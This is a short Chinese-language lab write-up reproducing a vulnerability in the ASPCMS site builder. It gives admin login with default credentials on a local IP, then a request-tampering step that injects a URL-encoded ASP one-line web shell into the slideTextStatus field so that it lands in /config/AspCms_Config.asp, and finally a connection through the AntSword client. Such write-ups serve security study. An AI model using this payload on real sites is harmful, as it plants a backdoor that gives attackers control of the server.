ASPCMS是由上⾕⽹络开发的全新内核的开源企业建站系统,能够胜任企业多种建站需求,并且 ⽀持模版⾃定义、⽀持扩展插件等等,能够在短时间内完成 企业建站。
漏洞复现
姿势⼀:后台修改配置⽂件拿Shell
1.访问以下地址为ASPCMS...并登陆到后台(这⾥注意在搭建站点的时候注意权限问题)
#⽹站后台
http://192.168.3.144:81/admin_aspcms/login.asp //全功能版本
#账户密码
username:admin
password:123456
2.点击 【扩展功能】 --》 【幻灯⽚设置】 --》点击 【保存】 --》开启代理进⾏抓包
4.在抓取的数据包中修改 slideTextStatus 字段的值为以下代码并进⾏发包查看被修改的asp ⽂件内容
#字段值
1%25><%25Eval(Request (chr(65)))%25><%25 密码是a
#影响⽂件
/config/AspCms_Config.asp
放行数据包
5.访问一下地址进行连接
7.蚁剑连接